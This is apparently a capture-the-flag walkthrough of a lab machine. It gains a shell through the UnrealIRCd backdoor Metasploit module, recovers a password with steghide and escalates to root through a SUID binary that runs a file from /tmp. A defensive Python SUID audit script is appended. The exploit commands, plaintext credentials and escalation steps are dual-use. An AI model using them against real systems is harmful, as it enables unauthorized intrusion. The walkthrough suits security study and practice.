nmap result

The web server has nothing interesting on it. I tried DirBuster but did not find anything interesting. The index file contains only an emoji.

There is an IRC service running, which looks interesting, so let's dig into that.

Using searchsploit, we found that UnrealIRCd is vulnerable. Googling this exploit, I found a Metasploit module.

searchsploit result

Exploiting the Server

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 10.10.10.117

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

exploit using MSF

This gives us a shell, and using Python we upgrade it to an interactive shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Low privilege shell

Using the IRC exploit we got a low-privilege shell. Searching for the user.txt file, I found that it is in another user's Documents folder, but we don't have permission to open the file.

User.txt file location

The .backup file gives us some interesting info.

Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss

So the password is related to steganography. Steghide is the most common stego tool that uses a password.

Trying UPupDOWNdownLRlrBAbaSSss on the irked.jpg image, which is on the index page, gives us the password.

To install steghide:

apt-get install steghide

steghide

Password: Kab6h+m+bbp2J:HG

OWN USER

$ su djmardov

Password: Kab6h+m+bbp2J:HG

$ cat djmardov/Documents/user.txt

User.txt

PRIVILEGE ESCALATION

$ find / -perm -u=s -type f 2>/dev/null



/tmp/listusers

/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/usr/lib/eject/dmcrypt-get-device

/usr/lib/policykit-1/polkit-agent-helper-1

/usr/lib/openssh/ssh-keysign

/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper

/usr/sbin/exim4

/usr/sbin/pppd

/usr/bin/chsh

/usr/bin/procmail

/usr/bin/gpasswd

/usr/bin/newgrp

/usr/bin/at

/usr/bin/pkexec

/usr/bin/X

/usr/bin/passwd

/usr/bin/chfn

/usr/bin/viewuser

/sbin/mount.nfs

/bin/su

/bin/mount

/bin/fusermount

/bin/ntfs-3g

/bin/umount

We find a non-standard Linux binary /usr/bin/viewuser.

/usr/bin/viewuser

This application executes /tmp/listusers, so let's put a shell in listusers and run it one more time.

listusers with shell

gain root

switch to the interactive shell

OWN ROOT
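
From the defender's side, the weakness used above is a SUID binary that runs a file from a world-writable directory (/tmp/listusers). The following Python audit is an added example, not part of the original write-up: it walks the given directories, picks out SUID files and flags any that embed a path under /tmp, /var/tmp or /dev/shm. The function names, the directory list and the sample bytes are assumptions made for illustration.

```python
import os
import re
import stat

# Assumption: directories any local user can write to on a default Linux install.
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Runs of printable ASCII starting with "/", similar to what `strings` prints.
PATH_RE = re.compile(rb"/[\x21-\x7e]{3,}")


def risky_paths(blob):
    """Return embedded absolute paths that sit under a world-writable directory."""
    found = []
    for match in PATH_RE.finditer(blob):
        path = match.group().decode("ascii")
        if path.startswith(WRITABLE_PREFIXES) and path not in found:
            found.append(path)
    return found


def is_setuid(mode):
    """True for a regular file with the set-user-ID bit (what find -perm -u=s matches)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def audit(roots=("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib")):
    """Map each SUID file under roots to the world-writable paths it references."""
    findings = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    if not is_setuid(os.lstat(path).st_mode):
                        continue
                    with open(path, "rb") as handle:
                        hits = risky_paths(handle.read())
                except OSError:
                    continue  # unreadable or vanished file: skip it
                if hits:
                    findings[path] = hits
    return findings


# Constructed sample bytes standing in for a binary's string table (not the real viewuser).
SAMPLE = b"\x7fELF\x02\x01\x00setuid\x00/tmp/listusers\x00/usr/bin/who\x00/bin/sh\x00"

if __name__ == "__main__":
    print("sample:", risky_paths(SAMPLE))
    for suid_file, hits in sorted(audit().items()):
        print(suid_file, "->", ", ".join(hits))
```

A hit is a lead for manual review rather than proof: the match is a string heuristic, so confirm how the binary uses the path before removing the SUID bit or the binary.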